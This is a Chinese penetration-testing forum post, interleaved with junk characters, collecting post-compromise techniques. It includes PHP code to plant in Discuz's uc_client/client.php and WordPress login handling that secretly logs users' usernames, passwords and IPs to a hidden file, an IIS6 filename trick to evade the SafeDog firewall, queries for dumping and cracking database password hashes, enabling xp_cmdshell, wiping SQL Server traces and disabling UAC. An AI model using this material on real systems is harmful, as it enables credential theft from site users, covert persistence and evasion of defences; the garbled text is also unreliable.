  v( F0 l# c7 W+ K, Q9 f, ]- _当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。# e/ S9 k- {4 l6 q% c, x
就是搜索case ‘login’
/ i4 X1 W, r) i- p) U+ k- A, j: }# `在它下面直接插入即可,记录的密码生成在pwd.txt中," G- a4 }0 s  I. z5 B
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录; f) H. J+ P' d3 R
利用II6文件解析漏洞绕过安全狗代码:
( U7 K& r* Q0 G0 r' w;antian365.asp;antian365.jpg6 v/ a0 ?, N, T2 ]% M8 F. \

$ @+ \4 D: Y: Y3 b9 O) a7 j( a各种类型数据库抓HASH破解最高权限密码!) H4 ]# P7 G$ c
1.sql server2000' }' R! n4 d+ v: s$ b* D
SELECT password from master.dbo.sysxlogins where name='sa'
+ d7 G4 o% j: \1 W; ?  T# \0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
/ i0 ?1 W# p2 |6 ~2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0 o! Y5 N$ N& s# y; J
- I7 D; N8 M- F: {8 a1 o# O0×0100- constant header! Y" e3 R7 T( g' {; f" k
34767D5C- salt
' z: j2 j9 Z; ]8 ?: o* t  ~( o0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash% ?+ L* o1 k6 e( F; q8 a& |% f
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash8 b7 Q1 r4 f  A" y7 W  U  E
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
1 r  s# r3 e8 M/ [( ]SQL server 2005:-9 ], c6 s5 Q0 R3 T
SELECT password_hash FROM sys.sql_logins where name='sa'# m+ y$ h7 Y* L; P
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F5 V9 f* p" C8 U; L1 R/ I
0×0100- constant header* Q, Q- o: W) E: K2 u% l* w* Z1 u
993BF231-salt
+ Z. g- _. w+ [$ K' H5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; t9 w3 M9 P  ^, {1 \2 m3 X8 l7 ucrack case sensitive hash in cain, try brute force and dictionary based attacks.
& @$ H" Q0 S5 o  |. T3 M6 r1 |  Q: _& b' D- |# U* U* j
update:- following bernardo’s comments:-
- E7 k* o6 t$ b" l0 Cuse function fn_varbintohexstr() to cast password in a hex string.
* d! X: |' {3 ce.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins! K7 b) `4 G6 u, z6 [9 G
2 W+ j  a% D, V% ]- g8 B
MYSQL:-
& z0 s) r! o: H5 E
1 v- d; R( t* R0 ~" ^In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.( L/ c: N% {8 n, P/ d
3 m: s* T9 }* W
*mysql  < 4.18 G$ z3 O5 _( u6 i0 Z/ K
+ r9 b: g3 L, A4 ?7 I; P
mysql> SELECT PASSWORD(‘mypass’);5 P, {% H: j0 H; {
+——————–+, T! v; S. |5 v/ t
| PASSWORD(‘mypass’) |2 C" j: ?; [; e8 P8 e
+——————–+
5 e( {# Y: z. X$ y% Z! t5 H| 6f8c114b58f2ce9e   |  ]1 i) Q" V& S# `5 h1 y! n
+——————–+
2 v+ m7 h' z1 T6 M4 }1 e; B9 j+ u
" Z+ `2 A( i2 ?*mysql >=4.1/ @' I$ N$ u3 v* p
: l9 j4 q0 ~9 J9 ~' h+ }( d
mysql> SELECT PASSWORD(‘mypass’);
7 \; k5 Y7 }% X0 {9 ~/ w+——————————————-+
& u% R7 m% E( r8 i" E| PASSWORD(‘mypass’)                        |
* Z# P, y2 l, N1 _& K7 W* Z: |+——————————————-+" `% m5 H& H0 S  Q" V
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
4 x" p( O( |8 Y: p. r+——————————————-+
6 d0 l6 F, f1 y6 T
- Y. s+ X5 ]4 E: P3 C3 q7 S% iSelect user, password from mysql.user
7 D0 N4 u  B' G5 aThe hashes can be cracked in ‘cain and abel’
5 Z1 h" u* D# N) j/ `* t# P$ p2 S. ^* D/ k
Postgres:-
8 B0 f/ |# I( S2 o6 hPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)+ S  j7 B/ T$ A2 i- f; q
select usename, passwd from pg_shadow;" c, R, G2 s4 V1 J5 K6 ?' m
usename      |  passwd. H- R- ]1 E2 g6 z
——————+————————————-
" ~8 J1 O) I9 X& i: q+ C0 W& I7 Qtestuser            | md5fabb6d7172aadfda4753bf0507ed43961 u1 I1 D6 }5 j: e
use mdcrack to crack these hashes:-
# p8 ^5 f. q0 r' ]5 Y! s2 j: A. t$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396# w. t8 F8 x8 a; f

1 {- x- H% s- X; F2 {Oracle:-
: k1 t$ v( v, I: u, q  z* y3 b/ i, uselect name, password, spare4 from sys.user$& `3 j! D+ h* O( c, T
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g/ P, a. \& @0 p4 ]
More on Oracle later, i am a bit bored….  h7 b7 Q3 M) I

4 \0 L0 h& C" w7 h; I  c$ U  Y9 N8 }7 ]) q0 `; R
在sql server2005/2008中开启xp_cmdshell6 U& L6 Q+ |. O" v* ^
-- To allow advanced options to be changed.
3 T# p4 b$ N) fEXEC sp_configure 'show advanced options', 12 g7 g& x1 G" y. Z- @2 h- u2 p7 d
GO8 m2 U3 Q4 n: M2 Y% K0 `$ ]
-- To update the currently configured value for advanced options.
+ t# E* b6 t- h( |RECONFIGURE% W) `/ m6 R" W/ F& A# u! J( R
GO0 ~% H: d# x( G; k0 ]
-- To enable the feature.& Y% y4 p( Q! ^$ x2 D
EXEC sp_configure 'xp_cmdshell', 1
( b% `% ]- K7 A% @* {GO. i8 P5 B0 l$ n8 P) q. x
-- To update the currently configured value for this feature.4 L( J9 c6 L7 q- ~9 o
RECONFIGURE% m5 E# {$ ~2 d, E  p5 _+ Y9 M
GO0 ~- S. R! ]* G9 s5 {% k
SQL 2008 server日志清除,在清楚前一定要备份。
; m; E+ ?+ g+ M1 @* E5 @如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
4 R1 c% A/ _9 x$ R! n; WX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin  q* }  f3 T  i
9 A* h# E3 }; I$ ^) n# T% u
对于SQL Server 2008以前的版本:
8 h0 A% r' Y- A* iSQL Server 2005:- l" M7 |' g& K( J
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat. M9 f" J: Y9 A" ~1 j5 V
SQL Server 2000:
# u; K7 Y" _: Q  A. e清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
6 _: k6 b' C6 ?# G" h  Q6 p$ q9 [% x# \9 X& t
本帖最后由 simeon 于 2013-1-3 09:51 编辑# h2 b7 {* o# ]. r$ q3 L
% [% e4 i8 O  Y% G5 k  T  M
; D2 u4 q  p  y- n4 t
windows 2008 文件权限修改
0 u2 W( I6 m- X; P1 G1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx( K6 }" P! x! ~0 c3 f, {
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98; O2 M8 o. V) r) U. y( t7 b3 `
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”," B6 g* Y" O) F, ?; |: Q0 a

' W/ d* f9 e4 P- B5 m0 \Windows Registry Editor Version 5.00
, P' \; c# ^' B2 X3 X" s[HKEY_CLASSES_ROOT\*\shell\runas]
) ~7 j0 j, w3 J& u@="管理员取得所有权"
- c* V3 ^5 Q4 |! X2 P"NoWorkingDirectory"=""8 c: X5 u6 P+ M
[HKEY_CLASSES_ROOT\*\shell\runas\command]4 a! k  K- w. ^/ J
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 X" H) }  V* p4 u"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"4 {2 x& M5 m) _6 L1 a
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
* [6 ~8 @6 m+ m' [. x' `@="管理员取得所有权") R6 C% e) V0 ?* u( }
"NoWorkingDirectory"=""
  q# K! t3 _- z[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]: a% R7 I6 S& Z* R. p$ L
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 x! R$ p( F/ i3 S9 _# }"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"1 D- r/ Y. z3 j# V( U8 ^$ O

% f, p- v& H  K9 @2 r/ ^& M[HKEY_CLASSES_ROOT\Directory\shell\runas]# w! `$ s0 R3 ?9 n# P7 h
@="管理员取得所有权"& y; W, O9 V; ?$ P+ L6 |: T
"NoWorkingDirectory"=""
* T+ n* `& O, m- N/ @6 J[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
" D+ O2 S; M; B& r+ U@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
7 @/ P7 e0 E' q* `. F7 s"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"' d# Z# ~. u+ q$ F% m+ r
. l7 O1 e9 y# |7 I% C" [7 {4 O9 h

8 G7 p& v( u0 Owin7右键“管理员取得所有权”.reg导入; q6 P2 R/ n% E' {: q4 v
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,& U  r6 z. f2 P& H
1、C:\Windows这个路径的“notepad.exe”不需要替换7 X  c0 [4 J' t9 w- d9 H
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换9 S% _: C! S( z
3、四个“notepad.exe.mui”不要管9 l% X/ Q  k6 L1 }# [
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
1 O3 c2 i+ i4 ]  K+ K, F  h! t& nC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”' O) B3 O3 `1 n' u: r7 \2 ]2 v
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
8 Y, R5 c# k# t) \替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
. n# \4 Q  s( ~$ o3 D5 ^7 T9 Owindows 2008中关闭安全策略: . l3 d, K# U; ~
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4 ~+ i0 C1 D" G. l+ Z4 y# d# H( |修改uc_client目录下的client.php 在
( u9 \; {) o2 ~. ~9 _$ k5 @function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {+ K7 K8 o, Q; [+ z: d" B4 K
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php& o  C( V3 C( w: x6 j: S, ?
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw0 N: t( `+ v* D# v# G
if(getenv('HTTP_CLIENT_IP')) {
. x- V5 H+ Q9 s. p* b% L: B; L$onlineip = getenv('HTTP_CLIENT_IP');
8 o; r% t7 i3 ~/ D) y/ Q} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
; [) o, p( i0 R1 ]- V8 f! B$onlineip = getenv('HTTP_X_FORWARDED_FOR');
- H; u, V, D6 x  _, W3 M} elseif(getenv('REMOTE_ADDR')) {+ D3 q5 Y. T; {* K! `2 B& ]
$onlineip = getenv('REMOTE_ADDR');
( c" Y: a2 U' d+ y} else {+ ?0 F( E1 Y, k% V1 A" ^# V
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];6 `; z# w" F1 [  ~& {$ V
}
9 ~, E! _6 t7 C  z& o; z     $showtime=date("Y-m-d H:i:s");
8 l1 S; W) Y* d. H7 R" [6 d    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";1 Z$ k) Y$ U! I/ g
    $handle=fopen('./data/cache/csslog.php','a+');
, c+ o; _$ j7 o- N  G    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2